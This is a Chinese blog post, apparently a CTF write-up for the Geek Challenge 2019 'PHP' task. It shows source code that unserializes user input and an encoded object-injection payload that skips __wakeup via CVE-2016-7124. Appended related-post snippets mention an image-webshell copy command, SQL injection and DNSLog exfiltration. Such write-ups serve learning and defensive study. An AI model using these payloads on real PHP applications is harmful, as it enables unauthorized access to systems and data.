极客大挑战2019PHP——反序列化

原创 已于 2023-10-31 10:43:56 修改 · 153 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #网络安全 #安全 #web安全

于 2023-10-31 10:42:51 首次发布
文章讲述了作者如何通过下载zip文件,分析其中包含的PHP代码,利用CVE-2016-7124漏洞绕过安全措施,成功获取flag的过程。关键在于理解`__construct`和`__destruct`方法,以及序列化和`unserialize`函数的作用。

扫描目录发现www.zip文件,然后进行下载

 下载后解压查看核心代码

index.php

<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>

通过GET方式接收变量$select,再将$select反序列化操作赋值给变量$res

class.php

<?php
include 'flag.php';

error_reporting(0);

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();          
        }
    }
}

通过分析代码只需要满足username === 'admin'即可得到flag,在对象创建时__construct()给$username和$password赋值,销毁时调用__destruct()方法,所以我们只需要使password = 100 并且 username ='admin',所以构造payload

<?php
class Name
{
    private $username = 'admin';
    private $password = 100;
}

$a = new Name();
echo serialize($a);
?>

输出结果

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

再urlencode()

O%3A4%3A%22Name%22%3A2%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bi%3A100%3B%7D

使用get方法给select传参

没反应,回去看index.php中发现,在接收到select变量时进行了unserialize(),所以触法__wakeup()方法所以将$username值强行改为了'guest',所以我们需要了解一个漏洞CVE-2016-7124

CVE-2016-7124

漏洞影响版本:

PHP5 < 5.6.25

PHP7 < 7.0.10

漏洞产生原因: 如果存在wakeup方法,调用 unserilize() 方法前则先调用wakeup方法,但是序列化字符串中表示对象属性个数的值大于 真实的属性个数时会跳过__wakeup的执行

所以我们重新构造payload,只需要将下面这个

O%3A4%3A%22Name%22%3A2%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bi%3A100%3B%7D

变量个数改成大于2的数字即可

O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bi%3A100%3B%7D
所以最终的payload为
O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bi%3A100%3B%7D
获得flag

 

注意

在修改payload时,如果先把

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

中的2改为比2大的数字,再进行urlencode是不对的,因为private 属性序列化的时候格式是%00 类名%00 成员名,是不显示的,所以要先进行urlencode,然后再更改.

WSX_ASD
关注
__wakeup绕过版本_PHP__wakeup()方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
08-29 1441
​ __wakeup函数是在php在使用反序列化函数unserialize()时,会自动调用的函数。只要序列化的中的成员数于实际成员数,即可绕过
网络安全 | CTF】CTF极客挑战2019PHP解题详析(Dirsearch+php反序列化
等风来
08-24 7635
同时,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化(即构造POC)时,类名和字段名前面都会加上ascii为0的字符(不可见字符)construct 是构造函数,在对象被创建的时候自动调用,进行类的初始化,也就是说对象创建完成以后第一个被对象自动调用的方法。如果构造的链子中含有空格,那么空格被url编码为%20后会导致链子不能被反序列化。得到的扫描结果中包含www.zip目录。提示:有一个良好的备份网站的习惯。
PHP反序列化中如何绕过_wakeup()函数的一些技巧
m0_63138919的博客
08-28 1918
本文为魔术方法_wakeup()的一些绕过用法
ctfshow web入门反序列化263——学习session的两种存储方式
qq_45766062的博客
09-14 890
一. 题目分析: 跑dirsearch发现有个www.zip压缩包,是网站的源码,通过源码分析,我先梳理解题思路: (1)首先访问首页,建立session,并获得cookie。 (2)然后将cookie修改为反序列化字符串 (3)访问check.php实现反序列化shell的写入 (4)访问log-1.php,获取flag 废话不多说直接上exp: <?php class User{ public $username; public $password; public $sta
反序列化魔术方法__wakeup跳过
lgsyydsa的博客
08-25 248
而__construct函数是在创建对象才会调用,在这里不知道是反序列化时没有创建对象还是在给序列化前给admin 和passwd赋了值就不会覆盖了....所以这里可以忽略__construct魔术方法。看到__wakeup是将passwd的值进行sha1加密,然后在__destruct中加密后的passwd还要等于"wllm"....而sha1很难进行反向操作的,所以要绕过,所以这里用上。而我们能操作的就是传入p参数,因为反序列化会自动调用一些函数__wakeup __destruct。
ctf 反序列化字符逃逸
giaogiao123的博客
12-17 1066
第一种,关键词过滤,变多的 比如0ctf :piapiapia 我先说一次什么是反序列化字符逃逸。 <?php class user{ public $user = 'admin'; public $pass = 'passwd'; } $a = new user(); $b = serialize($a); echo $b."<br>";
[极客挑战 2019]PHP 1——php反序列化
weixin_51325053的博客
09-12 618
保存,然后获得序列化后的字符串:O:4:“Name”:2:{s:14:“Nameusername”;发现一段php文件,包含class.php文件,用get的方式传入一个select参数,并将结果反序列化(unserialize)我们将用这串序列化的字符串替换select,但问题是,当执行反序列(unserialize)时,会首先执行。在反序列化时,当前属性个数于实际属性个数时,就会跳过__wakeup(),去执行__destruct。于是,我们直接回到网页,然后拼接www.zip于是我们就下载了源码,
BUUCTF——[极客挑战 2019]PHP
doraemon12345的博客
06-07 545
打开题目,页面上显示说习惯备份,尝试下载备份www.zip,下载后打开查看 flag文件里并不是flag,查看其他的在class文件中发现代码,应该是让我们反序列化,给出源代码 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct(
反序列化-极客挑战2019php【I have a cat!】
XiaoYeZhu_1314的博客
07-24 570
反序列化,第一反应该拿到他的源码。
2025.2.11——一、[极客挑战 2019]PHP wakeup绕过|备份文件|代码审计
2402_87387800的博客
02-11 1252
题目来源:BUUCTF [极客挑战 2019]PHP
【CTF】buuctf web(三)——PHP序列化与反序列化
m0_52923241的博客
08-04 2363
[极客挑战 2019]PHP 题目类型:序列化与反序列化 这儿提示备份网站,用dirsearch扫一下后台目录 输入:python dirsearch.py -u http://9b76aef7-3183-4da4-a909-0f95ad5b6607.node4.buuoj.cn -e php 找到www.zip,访问一下 跳出弹窗,点击下载 发现有flag.php目录 <?php $flag = 'Syc{dog_dog_dog_dog}'; ?> 无用信息 查看index.php
[0CTF-2016] piapiapia
Logerrik的博客
05-11 608
[0CTF-2016] piapiapia PHP反序列化字符逃逸 1.www.zip源码泄露 试了下发现不太像sql注入,扫下目录发现www.zip泄露 最近好多题都是这种源码泄露,建议字典齐全一点,不然扫不出来真的难受 2.源码 源码还挺多 config.php里面看到有flag,最后目标应该就是读取到config里面的flag就可以了 $config[‘hostname’] = ‘127.0.0.1’; $config[‘username’] = ‘root’; $config[‘password’
PHP在微服务中的配置中心
2509_93947720的博客
11-26 426
在微服务架构里,配置中心相当于所有服务的"指挥中心",把散落在各处的配置项统一收拢管理。而配置中心能让所有服务实时获取最新配置,就像给每个服务装了遥控器,改个参数值都不用重启服务。毕竟PHP天生适合快速迭代,加上配置中心的动态配置能力,简直是为业务频繁变动的场景量身定制的。不过要提醒的是,配置项命名必须规范。我们初期踩过坑,不同团队用不同的命名风格,有的用驼峰有的用下划线,查找配置时特别混乱。说到具体实践,我们团队现在把配置分为三类:静态配置写在代码里,环境配置交给配置中心,动态配置通过管理界面实时调整。
MySQL 教程(超详细,零基础可学、第一篇)
最新发布
2509_94101649的博客
11-27 277
MySQL 是一个关系型数据库管理系统,由瑞典 MySQL AB 公司开发,目前属于 Oracle 公司。MySQL 是一种关联数据库管理系统,关联数据库将数据保存在不同的表中,而不是将所有数据放在一个仓库内,这样就增加了速度并提高了灵活性。MySQL 是开源的,目前隶属于 Oracle 旗下产品。MySQL 支持型的数据库。可以处理拥有上千万条记录的型数据库。MySQL 使用标准的 SQL 数据语言形式。MySQL 可以运行于多个系统上,并且支持多种语言。
6.Nginx服务器
2301_77138478的博客
11-26 467
摘要:本文介绍了Nginx服务器的安装与配置方法,重点讲解了虚拟主机和SSL/TLS配置。主要内容包括:1) 通过yum安装Nginx并启动服务;2) 基于名称和端口的虚拟主机配置,实现多站点服务;3) 使用OpenSSL生成自签名证书,配置HTTPS站点;4) 设置HTTP到HTTPS的重定向。文中提供了详细的命令操作和测试步骤,并配有配置截图和测试结果展示,帮助用户快速掌握Nginx的基本配置方法。
Web漏洞实战案例】
2302_80252080的博客
11-25 923
本文摘要:DNSLog技术利用DNS解析机制实现漏洞探测,主要适用于RCE、XXE、SSRF等漏洞类型。文章详细介绍了DNSLog使用限制(域名层级、长度等)和解析流程,并提供了Linux下获取变量值、编码输出等利用方法。重点讲解了在XSS、RCE、XXE、SSRF等漏洞场景中的实际应用案例,以及MySQL中load_file函数的特殊用法。特别指出Windows环境下MySQL的DNSLog注入步骤,包括数据库信息泄露的具体实现方法。最后通过SQL注入案例展示了如何通过DNSLog外带数据库信息。
在Linux系统上使用nmcli命令配置各种网络(有线、无线、vlan、vxlan、路由、网桥等)
2509_94201400的博客
11-25 798
本文所有内容都由我亲自试验并总结,如果有朋友转载,请标明出处毕竟网上对于NetworkManager工具的各种解释都过于片面,也没有一个比较全面的示例,所以在本文上我还是耗费了很多的精力和时间的这其中当属无线网络的AP模式开启和两个ubuntu系统配置Vxlan上最耗费时间因为是虚拟机,会遇到各种各样的不适配或者其他bug,都需要一样找出问题来目前这里暂时只展现这些最常用的配置示例,目的是为了让家在以后面对各式各样的Linux系统时能够更便捷的进行统一的网络配置!!
PHP True Async RFC 被拒——原生异步离 PHP 还有多远?
qq_31470439的博客
11-26 333
PHP原生异步编程(RFC)被否决,9票反对0票通过。该RFC旨在为PHP核心添加真正的异步能力,但核心开发者并非反对异步本身,而是质疑具体实现方式,主要问题包括:命名规范不符(PHP应使用蛇形命名而非驼峰)、异常层级设计不当,以及全局调度器设计存在潜在风险。尽管技术实现已相对成熟(基于Fibers和libUV),但社区更重视API设计的严谨性。这反映了PHP对稳定性的重视,而非拒绝异步功能。未来可能通过分阶段实现、改进API设计并扩测试来推进该特性。虽然进程放缓,但PHP向现代化语言演进的趋势不会改变。
php 7.4 配置安装php-zbarcode扩展
牛奔的博客
11-26 273
不是 PHP 官方扩展(这是一个较旧的仓库,最后更新于多年前,但支持 PHP 5.x 到 7.x,包括 7.4。克隆后需检查兼容性并编译。(这个 fork 明确支持 PHP 7,并修复了部分崩溃 bug,适合 PHP 7.4 使用。我将使用进行编译安装扩展。
极客挑战 2019 PHP
01-03
### 极客挑战 2019 PHP 比赛详情 #### 文件上传与图片马利用 在极客挑战2019中,存在一道涉及文件上传漏洞的题目。攻击者可以通过特定技术手段绕过服务器端的安全检查机制来实现恶意代码的上传并执行。具体来说,通过文件头及文件内容检测的方式,将后缀名为`.jpg`的文件成功上传至服务器[^3]。 为了进一步提升攻击效果,还可以采用DOS命令组合不同类型的文件创建所谓的“图片马”。例如使用如下命令: ```bash copy 1.jpg/a+php.php/b php.jpg ``` 此操作会把一张正常图像文件同包含PHP脚本的内容合并成一个新的复合文件,在某些配置不当的服务环境中能够被执行从而达到远程控制的目的。经过测试确认,除了常见的`.php`扩展名外,像`.phtml`这样的变种同样会被解释器识别处理。 #### SQL注入技巧探讨 另一类值得关注的是关于SQL注入方面的考察点。对于可能存在此类风险的应用程序接口而言,了解如何根据返回错误提示推测数据库查询结构是一项重要技能。当面对含有多个参数的情况时,则需尝试分别提交诸如整数、字符串等形式的数据片段去观察响应变化规律,进而推断出完整的SQL表达式构成模式[^4]。 ```sql SELECT * FROM users WHERE id = '1' AND username='admin' ``` 上述例子展示了基本形式下的条件拼接逻辑;而在实际竞赛场景里,选手们往往要应对更复杂多样的情形,比如嵌套子查询或者联合查询等高级语法应用场合下所引发的各种异常状况分析工作。
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值